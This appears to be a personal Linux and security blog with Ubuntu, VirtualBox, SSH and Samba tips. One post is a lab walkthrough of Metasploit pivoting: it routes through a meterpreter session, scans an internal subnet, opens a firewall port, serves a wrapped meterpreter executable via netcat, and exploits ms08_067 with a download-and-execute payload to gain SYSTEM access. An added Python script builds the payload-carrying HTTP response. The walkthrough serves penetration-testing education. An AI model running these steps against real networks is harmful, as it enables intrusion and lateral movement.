Also, AFAIK, this is possible with ext4 filesystems:


user@ubuntu:~$ touch test.txt && ls -l test.txt
-rw-r--r-- 1 user user 0 2011-09-27 18:38 test.txt
user@ubuntu:~$ cat << __eof > test.txt 
Hi there,
Hope you all fine.
__eof
user@ubuntu:~$ ls -l test.txt 
-rw-r--r-- 1 user user 29 2011-09-27 19:44 test.txt
user@ubuntu:~$ ls -i test.txt 
14552801 test.txt
user@ubuntu:~$ sudo debugfs -R 'stat <14552801>' /dev/sda7 
[sudo] password for user:
Inode: 14552801   Type: regular    Mode:  0644   Flags: 0x80000
Generation: 340511001    Version: 0x00000000:00000001
User:  1000   Group:  1000   Size: 29
File ACL: 0    Directory ACL: 0
Links: 1   Blockcount: 8
Fragment:  Address: 0    Number: 0    Size: 0
 ctime: 0x4e81da5b:513cbff4 -- Tue Sep 27 19:44:51 2011
 atime: 0x4e81da5e:c8725434 -- Tue Sep 27 19:44:54 2011
 mtime: 0x4e81da5b:513cbff4 -- Tue Sep 27 19:44:51 2011
crtime: 0x4e81cacc:966104fc -- Tue Sep 27 18:38:28 2011
Size of extra inode fields: 28
EXTENTS:
(0): 58665199
debugfs 1.41.11 (14-Mar-2010)

Note the various timestamps in the output:

atime: last access (read) time
ctime: last inode change (owner, mode, link count, etc.); it is also updated when the contents are modified
mtime: last modification time of the contents
And most importantly
crtime: file creation (birth) time

Two caveats worth knowing. crtime belongs to the inode, not to the file name: a program that saves by writing a temporary file and renaming it over the original (most editors) gives the file a new inode and therefore a new crtime, whereas 'cat > test.txt' above rewrote the existing inode and kept it. And unlike atime and mtime, crtime cannot be set from user space with touch, which is what makes it useful for spotting files whose other timestamps have been backdated.
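An added example, not from the original post: a Python parser for the debugfs 'stat' output above that decodes the raw ext4 timestamps instead of trusting the pretty-printed column. ext4 stores each time as 32 bits of seconds plus, when the inode has the extra fields, a second word whose low two bits extend the epoch and whose upper 30 bits are nanoseconds; 128-byte inodes (ext2/ext3 defaults) have neither the extra word nor a crtime. The sample dump is the one from the post. Decoded values are in UTC, whereas debugfs prints local time (18:38:28 above is IST, i.e. 13:08:28 UTC). The last function is the timestomping check from the caveat above: any timestamp earlier than crtime has been set backwards.

```python
import re
from datetime import datetime, timezone

# The inode dump from the post (debugfs 'stat <14552801>'), used here as sample input.
SAMPLE_STAT = """Inode: 14552801   Type: regular    Mode:  0644   Flags: 0x80000
Generation: 340511001    Version: 0x00000000:00000001
User:  1000   Group:  1000   Size: 29
Links: 1   Blockcount: 8
 ctime: 0x4e81da5b:513cbff4 -- Tue Sep 27 19:44:51 2011
 atime: 0x4e81da5e:c8725434 -- Tue Sep 27 19:44:54 2011
 mtime: 0x4e81da5b:513cbff4 -- Tue Sep 27 19:44:51 2011
crtime: 0x4e81cacc:966104fc -- Tue Sep 27 18:38:28 2011
Size of extra inode fields: 28
"""

TS_RE = re.compile(
    r"^\s*(crtime|ctime|atime|mtime):\s+0x([0-9a-fA-F]{1,8})(?::([0-9a-fA-F]{1,8}))?",
    re.M,
)


def decode_ext4_time(seconds_hex, extra_hex=None):
    """Turn ext4's on-disk (seconds, extra) pair into (epoch seconds, nanoseconds).

    The 32-bit seconds field is signed. With 256-byte inodes an 'extra' word follows:
    bits 0-1 extend the epoch (added as seconds << 32), bits 2-31 hold nanoseconds.
    """
    secs = int(seconds_hex, 16)
    if secs >= 1 << 31:
        secs -= 1 << 32
    nsec = 0
    if extra_hex is not None:
        extra = int(extra_hex, 16)
        secs += (extra & 0x3) << 32
        nsec = extra >> 2
    return secs, nsec


def parse_debugfs_stat(text):
    """Map timestamp name -> (aware UTC datetime, nanoseconds) for every timestamp line."""
    result = {}
    for name, secs_hex, extra_hex in TS_RE.findall(text):
        secs, nsec = decode_ext4_time(secs_hex, extra_hex or None)
        result[name] = (datetime.fromtimestamp(secs, tz=timezone.utc), nsec)
    return result


def crtime_epoch(text):
    """Creation time as integer epoch seconds, or None if the inode has no crtime."""
    ts = parse_debugfs_stat(text)
    return int(ts["crtime"][0].timestamp()) if "crtime" in ts else None


def timestamps_before_crtime(text):
    """Names of timestamps that lie before the creation time. atime and mtime can be
    pushed backwards with touch, crtime cannot, so anything listed here deserves a look."""
    ts = parse_debugfs_stat(text)
    if "crtime" not in ts:
        return []
    birth = ts["crtime"][0]
    return [name for name, (when, _) in ts.items() if name != "crtime" and when < birth]


if __name__ == "__main__":
    for name, (when, nsec) in parse_debugfs_stat(SAMPLE_STAT).items():
        print("%-7s %s.%09d UTC" % (name, when.strftime("%Y-%m-%d %H:%M:%S"), nsec))
    print("backdated:", timestamps_before_crtime(SAMPLE_STAT))
```

Feed it the output of 'debugfs -R "stat <inode>" /dev/sdXN' on a live system; debugfs only needs read access to the block device, so this works on a mounted filesystem and on a forensic image alike.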


Thanks to Hackuin, who had posted about it on garage4hackers forum.
Reference: http://www.garage4hackers.com/f30/did-you-know-330-2.html


..............Done!!!

Monday, July 11, 2011

Clone virtual machine in VirtualBox....

If you have used VMware Workstation earlier and are now working on VirtualBox, you may have to bang your head to create a cloned virtual machine, as it's not as easy as in VMware Workstation. (#FAIL @VirtualBox)

Never mind... here are the steps you can follow on your Ubuntu host OS to create a clone of a guest OS.

$ vboxmanage clonehd <source-folder/file.vdi> <destination-folder/clone.vdi>
0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%
Clone hard disk created in format 'VDI'. UUID: e64c4d5f-8ae1-4e69-aa68-cedd3fe5c43e
$

Next, create a new virtual machine.
When choosing the virtual hard disk, pick the option "Use existing hard disk" instead of creating a new one, and give the path of the 'vdi' file you've just created.
clonehd gives the copy its own UUID (printed above), which is what lets VirtualBox register both disks side by side; a plain file copy of the .vdi keeps the old UUID and VirtualBox refuses to register it. (Newer VirtualBox releases also have 'VBoxManage clonevm', which clones the whole machine, settings included.)

..............Done!!!

Friday, April 29, 2011

Ubuntu 11.04 is here...

Woohoo... Ubuntu 11.04, codenamed 'Natty Narwhal', has just been released.
Get your copy...

Here are some torrent files, you might be interested :)
-Desktop editions:
    -64 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-desktop-amd64.iso.torrent
    -32 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-desktop-i386.iso.torrent

-Server editions:
    -64 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-server-amd64.iso.torrent
    -32 bit : http://releases.ubuntu.com/11.04/ubuntu-11.04-server-i386.iso.torrent

Enjoy :-)

Saturday, April 16, 2011

Small tips and tricks

Thought to share few tips and tricks...

1. Ubuntu fresh installation
When making a fresh installation of Ubuntu, it's always safer to give separate partitions to boot, root (/), swap (if needed) and the home directory. So, during installation, select "Manual partitioning" and delete all the current partitions (ALWAYS REMEMBER TO TAKE A BACKUP BEFORE PROCEEDING WITH A FRESH INSTALLATION). Then specify partitions as follows (I will take my own system configuration as an example, to give you an idea):

- /boot : primary partition, 100MB
- /     : primary partition, 20GB (minimum recommended is 8GB)
- /home : primary partition, all remaining space

I didn't find any need for a swap partition, as I have 4GB RAM and the applications I would be running include VMware Workstation/VirtualBox, Ubuntu Compiz effects, Firefox, Google Chrome, etc.

So I didn't want to waste any space on swap if I won't be needing it. You may decide on swap according to your needs (note that hibernation, suspend-to-disk, needs a swap area at least as large as RAM).
Here is a link, which can be helpful for taking backup and reinstalling/upgrading ubuntu:
https://help.ubuntu.com/community/Partitioning/Home/Moving


2. Execute a command from history
Many times you want to re-run a very long command and you are as lazy as I am. So here is what you do ('!122:p' prints the command without executing it, handy for checking what you are about to run):

ubuntu@localhost:~$ history |grep rsync
  110  man rsync 
  111  rsync -h
  116  rsync -h |grep time
  117  rsync -h |grep -i time
  122  rsync -arH some/local/dir some-machine-name:/some/remote/dir
  .
  .
  .
  .
  .
  .
  .
ubuntu@localhost:~$ !122
rsync -arH some/local/dir some-machine-name:/some/remote/dir
ubuntu@localhost:~$


3. rsync : Sync and Backup utility in Ubuntu



..............Done(for now)!!!

Thursday, January 20, 2011

[Ubuntu] perl: warning: Setting locale failed.

Hi,

I have faced this problem many times, on client desktops and when I have had to configure some Ubuntu server, and had to search for the solution every time this annoying thing came up again.
Just thought of writing about it, so people (like me, who barely remember what they did to sort out the problem) won't face it again and again.


perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
 LANGUAGE = (unset),
 LC_ALL = (unset),
 LANG = "en_US.utf8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

So, here is what I did to solve it:

ubuntu@localhost:~$ sudo locale-gen en_US.UTF-8
[sudo] password for ubuntu:
Generating locales...
  en_US.UTF-8... done
Generation complete.
ubuntu@localhost:~$ sudo dpkg-reconfigure locales
Generating locales...
  en_US.UTF-8... up-to-date
Generation complete.
ubuntu@localhost:~$

..............Done!!!

Sunday, November 28, 2010

[n|u Delhi Presentations] Post exploitation techniques...

There was a presentation on "Post exploitation techniques using msf-nc kungfu" at the null monthly meet.
So here is a post about the presentation and the things I may have missed.

Aim:
There is a compromised machine in a network and you want to find/target other nodes inside that network.

Scenario:
The attacker, running BackTrack, sits outside the network. Machine A (the pivot) and machine B are behind NAT.



So here we go with the meterpreter session on pivot machine:

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:1e:d3:76
IP Address : 192.168.74.128
Netmask : 255.255.255.0


meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.74.2
127.0.0.0 255.0.0.0 127.0.0.1
192.168.74.0 255.255.255.0 192.168.74.128
192.168.74.128 255.255.255.255 127.0.0.1
192.168.74.255 255.255.255.255 192.168.74.128
224.0.0.0 240.0.0.0 192.168.74.128
255.255.255.255 255.255.255.255 192.168.74.128

meterpreter >

1. Pass the traffic for the desired subnet through the meterpreter session:
In order to run scans and use other modules against the internal network, we need to add a route so that traffic for that subnet is sent through the meterpreter session instead of the attacker's own interfaces.
Let's see how we can do that...

Back on the multi/handler...

msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.74.0 255.255.255.0 Session 1

msf exploit(handler) >

So now the network traffic meant for subnet 192.168.74.0/24 would be routed through meterpreter session 1.

2. Enumerate the nodes inside the network:
We will use the meterpreter script arp_scanner to sweep the subnet (an ARP sweep from the pivot sees every host on its LAN segment, including ones that drop ICMP).

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.

OPTIONS:

-h Help menu.
-i Enumerate Local Interfaces
-r The target address range or CIDR identifier
-s Save found IP Addresses to logs.


meterpreter > run arp_scanner -r 192.168.74.0/24
[*] ARP Scanning 192.168.74.0/24
[*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
meterpreter >


OK. As you can see, 5 IP addresses appear to be alive in the network.
192.168.74.1, 192.168.74.2 and 192.168.74.254 belong to VMware Workstation's virtual network (their MACs carry VMware's 00:50:56 prefix):
192.168.74.2 - NAT gateway for the virtual machines
192.168.74.1 - host-side adapter (vmnet8)
192.168.74.254 - DHCP server for the virtual machines behind NAT

192.168.74.128 is the pivot itself (see the ipconfig output above). So, apart from all that, there is exactly one more virtual machine, 192.168.74.129, which is of interest.
Let's find out...
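Added example, not part of the presentation or the original post: a Python triage of the arp_scanner output above. It pads the MAC octets the script prints unpadded, labels the two OUIs that appear (both registered to VMware), and returns the hosts worth port-scanning next: inside the subnet routed through the session, not the pivot, and not the host-side VMware adapters. The OUI roles are the ones they play in a Workstation NAT lab like this one; on ESX, guests also get 00:50:56 addresses, so treat the infrastructure filter as a hint rather than an identification.

```python
import ipaddress
import re

# The arp_scanner output from the post, used here as sample input.
ARP_OUTPUT = """[*] ARP Scanning 192.168.74.0/24
[*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
"""

# The two OUIs (first three octets) seen above; both are registered to VMware. The
# roles are those they play in a Workstation NAT lab (assumption for this example).
OUI_HINTS = {
    "00:50:56": "VMware: host-side vmnet adapter / NAT gateway / DHCP service",
    "00:0c:29": "VMware: auto-assigned guest NIC",
}
INFRA_PREFIXES = ("00:50:56",)

LINE_RE = re.compile(
    r"IP:\s*(\d{1,3}(?:\.\d{1,3}){3})\s+MAC\s+([0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5})"
)


def normalize_mac(mac):
    """arp_scanner prints octets without zero padding ('0:c:29:1e:d3:76'); pad them."""
    octets = mac.split(":")
    if len(octets) != 6:
        raise ValueError("malformed MAC address: %r" % mac)
    return ":".join("%02x" % int(octet, 16) for octet in octets)


def parse_arp_scan(text):
    """(ip, normalized mac) pairs in the order arp_scanner reported them."""
    return [(ip, normalize_mac(mac)) for ip, mac in LINE_RE.findall(text)]


def vendor_hint(mac):
    return OUI_HINTS.get(normalize_mac(mac)[:8], "unknown OUI")


def candidate_targets(hosts, pivot_ip, routed_subnet, infra_prefixes=INFRA_PREFIXES):
    """Hosts worth a port scan: inside the subnet routed through the session, not the
    pivot itself, and not (by OUI) the hypervisor's own host-side adapters."""
    network = ipaddress.ip_network(routed_subnet, strict=False)
    targets = []
    for ip, mac in hosts:
        if ipaddress.ip_address(ip) not in network or ip == pivot_ip:
            continue
        if mac.startswith(infra_prefixes):
            continue
        targets.append(ip)
    return targets


if __name__ == "__main__":
    hosts = parse_arp_scan(ARP_OUTPUT)
    for ip, mac in hosts:
        print("%-16s %s  %s" % (ip, mac, vendor_hint(mac)))
    print("scan next:", candidate_targets(hosts, "192.168.74.128", "192.168.74.0/24"))
```

The subnet check mirrors the route added in step 1: a host outside 192.168.74.0/24 would not be reachable through session 1 anyway, so there is no point queueing it for the port scanner.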



We will use the tcp portscan auxiliary module to find the open ports (checking a handful of well-known ones); thanks to the route added above, the connections go out through the pivot:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output

msf auxiliary(tcp) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445
PORTS => 21,22,23,25,80,110,135,139,443,445
msf auxiliary(tcp) > run

[*] 192.168.74.129:139 - TCP OPEN
[*] 192.168.74.129:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Alright. So ports 139 and 445 are open: file sharing (SMB) is enabled on the target machine.
We will use the infamous ms08_067 exploit...

But now there is a problem choosing an appropriate payload.
- A bind-shell payload is no good when we have no direct access to machine B: even if the exploit succeeds and B starts listening on the port the payload specifies, we cannot reach it from the attacker's machine. (Strictly speaking, Metasploit's bind_tcp handler does honour the route added above and would connect via session 1; the approach below does not depend on that.)
- Reverse-connect payloads can't be used either, assuming a situation where machine B has no direct route out to the attacker's machine.

So what I did was upload two files to the pivot: netcat, and a custom file that is a complete HTTP response (status line and headers) with a meterpreter executable appended as the body. The exploit is then fired with the download_exec payload, which makes B fetch a URL and execute whatever it receives, and that URL points at the pivot. The executable B downloads reverse-connects to the multi/handler listening on the attacker's machine; in this lab B turns out to be able to reach it, and that is used only to confirm that the exploit worked. In a genuinely isolated network the downloaded executable would have to talk to the pivot instead.

Let's do that...

meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp%
[*] uploading : /tmp/netcat.exe -> %temp%
[*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe
[*] uploading : /tmp/httpresponse-msf.cfg -> %temp%
[*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg
meterpreter >

Ok.
Now we start a minimal "web server" on the pivot: netcat listening on port 80 with httpresponse-msf.cfg redirected to its stdin, so whichever client connects gets the canned response back (the file's extension is irrelevant). netcat does not parse the request at all; it serves exactly one connection and then exits, which is all the download_exec payload needs.
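The httpresponse-msf.cfg file is a hand-made HTTP response with the executable appended, and the post does not show how it was built. As an added example (not the original post's code), here is a small Python script that wraps any executable into such a file and a parser that checks the result, including the case of a truncated transfer. The embedded "executable" is a constructed stand-in (the MZ magic plus filler), not a real PE, and the file names in the usage line are placeholders.

```python
"""Build (and sanity-check) a raw HTTP response file of the kind that can be
replayed to a single client with `nc -nlvp 80 < file`.

Added example; the function names and the sample payload are the editor's own.
"""
from pathlib import Path

# Constructed stand-in for the meterpreter executable: the DOS "MZ" magic plus
# filler bytes. It is NOT a real PE; it only exercises the byte handling.
SAMPLE_EXE = b"MZ" + bytes(range(256)) * 4


def build_http_response(body: bytes, content_type: str = "application/octet-stream") -> bytes:
    """Return a complete HTTP/1.0 response carrying `body` as its payload.

    HTTP/1.0 plus "Connection: close" tells the client not to expect keep-alive,
    and Content-Length tells it exactly how many bytes of executable follow, so
    a listener that merely streams this file and hangs up is good enough.
    """
    head = (
        "HTTP/1.0 200 OK\r\n"
        "Server: nc\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def parse_http_response(raw: bytes):
    """Split a raw response into (status line, header dict, body) and verify that
    the declared Content-Length matches the body actually present."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("missing CRLFCRLF header terminator")
    lines = head.split(b"\r\n")
    status = lines[0].decode("ascii")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("ascii").lower()] = value.strip().decode("ascii")
    declared = int(headers["content-length"])
    if declared != len(body):
        raise ValueError(f"Content-Length is {declared} but body is {len(body)} bytes")
    return status, headers, body


def write_response_file(exe_path: str, out_path: str) -> int:
    """Wrap the executable at exe_path into out_path; returns the bytes written."""
    raw = build_http_response(Path(exe_path).read_bytes())
    Path(out_path).write_bytes(raw)
    return len(raw)


if __name__ == "__main__":
    import sys
    # usage: python build_response.py meterpreter.exe httpresponse-msf.cfg
    print(write_response_file(sys.argv[1], sys.argv[2]), "bytes written")
```

Because the status line and headers are already in the file, netcat never has to understand HTTP; it just copies stdin to the socket. The parser is what you would run on the attacker's side before uploading, so a wrong Content-Length is caught before the exploit is fired rather than showing up as a silently truncated download on machine B.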

meterpreter > execute -H -f cmd.exe -c -i
Process 256 created.
Channel 9 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>cd %temp%
cd %temp%

C:\DOCUME~1\user\LOCALS~1\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 080D-40BD

Directory of C:\DOCUME~1\user\LOCALS~1\Temp

12/05/2010 01:57 AM <DIR> .
12/05/2010 01:57 AM <DIR> ..
10/23/2009 07:30 PM 8,704 21227.mst
10/23/2009 07:30 PM 8,704 21ad2.mst
10/23/2009 07:30 PM 8,704 48f1e.mst
10/23/2009 07:30 PM 8,704 c833.mst
08/15/2009 02:54 AM 8,704 ff21.mst
12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg
12/05/2010 01:57 AM 61,440 netcat.exe
10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log
06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log
09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log
09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log
11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log
06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log
09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log
09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log
11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log
11/29/2010 03:54 PM <DIR> VMwareDnD
18 File(s) 17,424,123 bytes
3 Dir(s) 40,819,601,408 bytes free

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 < httpresponse-msf.cfg
listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>




Oops. Looks like somebody is interfering with our business.
netcat reports that it is listening, but Windows Firewall on the pivot blocks inbound connections to port 80 unless an exception exists, so machine B's download would never get through.
We do have a shell on this machine though, and here is how we add an exception to the firewall (using netsh's legacy "firewall" context, which is what Windows XP provides)...

C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all
netsh firewall set portopening tcp 80 nc enable all
Ok.


C:\DOCUME~1\user\LOCALS~1\Temp>


Ok. Inbound connections to port 80 are now allowed through the firewall (this is a persistent change on the pivot, so remember to undo it once you are done).
Alright, let's run netcat once again, as before.

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 < httpresponse-msf.cfg
listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>exit
exit
^C
Terminate channel 9? [y/N] y
meterpreter >

All set. Now set the parameters and run ms08_067 for machine B...

meterpreter > background
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129
RHOST => 192.168.74.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/
URL => http://192.168.74.128/
msf exploit(ms08_067_netapi) > show options
Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.74.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/download_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
URL http://192.168.74.128/ yes The pre-encoded URL to the executable


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 172.16.24.1:36593 Request received for /Af4IZ...
[*] 172.16.24.1:36593 Staging connection for target f4IZ received...
[*] Patching Target ID f4IZ into DLL
[*] 172.16.24.1:45245 Request received for /Bf4IZ...
[*] 172.16.24.1:45245 Stage connection for target f4IZ received...
[*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000

msf exploit(ms08_067_netapi) >

Here we go...
As we can see, the exploit succeeded: machine B fetched the executable from the pivot and opened meterpreter session 2 back to the attacker's machine, running as SYSTEM.

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:7e:bd:74
IP Address : 192.168.74.129
Netmask : 255.255.255.0


meterpreter >



..............Done!!!

Thursday, November 18, 2010

SSH to server without any password...

You want access to an SSH server without typing the password every time you connect; the typical case is someone using scp very frequently to copy files from server to client or vice versa.

Scenario: user a on host A (client) wants to log in to host B (server), which runs OpenSSH, without a password. :-)
What this sets up is public-key authentication. "Without a password" only holds if the private key itself has no passphrase, so either accept that anyone who copies ~/.ssh/id_rsa from host A can log in as b, or give the key a passphrase and let ssh-agent cache it. On the server, ~/.ssh must not be group- or world-writable and authorized_keys should be mode 600; otherwise sshd (with the default StrictModes yes) silently ignores the file.

Steps:

a@ubuntu_A:~$ ssh-keygen -t rsa
a@ubuntu_A:~$ ssh b@ubuntu_B mkdir -p .ssh
b@ubuntu_B's password:
a@ubuntu_A:~$ cat .ssh/id_rsa.pub | ssh b@ubuntu_B 'cat >> .ssh/authorized_keys2'
b@ubuntu_B's password:
a@ubuntu_A:~$
a@ubuntu_A:~$ ssh b@ubuntu_B

Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102
b@ubuntu_B:~$

(authorized_keys2 is a legacy name that sshd still reads by default; the canonical file is .ssh/authorized_keys, which is also the one ssh-copy-id writes to.)

OR

Just came across this alternative...check this out:
a@ubuntu_A:~$ ssh-copy-id b@ubuntu_B
b@ubuntu_B's password:
a@ubuntu_A:~$ ssh b@ubuntu_B

Last login: Thu Nov 18 09:48:06 2010 from 192.168.1.102
b@ubuntu_B:~$

References:
http://linuxproblem.org/art_9.html
http://www.csua.berkeley.edu/~ranga/notes/ssh_nopass.html

..............Done!!!

Monday, September 27, 2010

Install a 32-bit application on 64-bit Ubuntu...

There are many cases where you need to install a 32-bit application in a 64-bit OS environment.
I ran into this when I had to install Google Earth on my 64-bit Ubuntu Lucid Lynx.

ubuntu@localhost:~$ sudo ./GoogleEarthLinux-5.1.bin
[sudo] password for ubuntu:
Verifying archive integrity... All good.
Uncompressing Google Earth for GNU/Linux 5.1.3535.3218...............................................................
setup.data/bin/Linux/amd64/setup.gtk2: error while loading shared libraries: libxml2.so.2: cannot open shared object file: No such file or directory
setup.data/bin/Linux/amd64/setup.gtk: error while loading shared libraries: libSM.so.6: cannot open shared object file: No such file or directory
The setup program seems to have failed on amd64

Fatal error, installer failed to run at all!
ubuntu@localhost:~$


The installer's own 64-bit setup binary fails because the 32-bit libraries it links against are missing. To fix this, all you need to do is install ia32-libs, and we are good to go.

ubuntu@localhost:~$ sudo apt-get install ia32-libs

There are other ways, though, to make 32-bit applications run on a 64-bit OS; on releases newer than Lucid, ia32-libs has been replaced by multiarch (adding the i386 architecture with dpkg and installing the required :i386 libraries).
Refer to this link for more options.

..............Done!!!

Tuesday, September 21, 2010

[Howto] Install Origami on Ubuntu...

Origami: a Ruby parser and analyzer for PDF documents.
Install Ruby and the required dependencies with a single command...

ubuntu@localhost:~$ sudo apt-get install ruby libgtk2-ruby libopenssl-ruby libssl-dev openssl

..............Done!!!

Monday, July 12, 2010

Share folders on an Ubuntu server through the CLI...

Edit the Samba configuration file at /etc/samba/smb.conf as follows...
i. For authenticated access, append...
[private]
comment = Private Share
path = /tmp/pri-share
browseable = no
read only = no

Clients connecting to this share authenticate as Samba users, so each user must already have a Samba password set (with smbpasswd) in addition to the Unix account.

ii. For anonymous read-only access, append...
[public]
comment = Public Share
path = /tmp/pub-share
read only = yes
guest only = yes
guest ok = yes

Keep read only = yes on this share: guest only maps every connection to the guest account, so read only = no here would let anyone on the network write to /tmp/pub-share. Run testparm to validate the file and reload smbd afterwards.

Be sure that, when accessing the shares from a Windows or Linux box, you use 'private' or 'public' as the share name rather than 'pri-share' or 'pub-share': the bracketed section name is the share name, and path is only where it lives on disk.

e.g. \\192.168.1.10\private
smb://192.168.1.10/private


..............Done!!!

Tuesday, July 6, 2010

Python tools for penetration testers...

Found this list (from a blog post by Dirk Loss) very interesting; it may well help a pen-tester...
Enjoy...

http://dirk-loss.de/python-tools.htm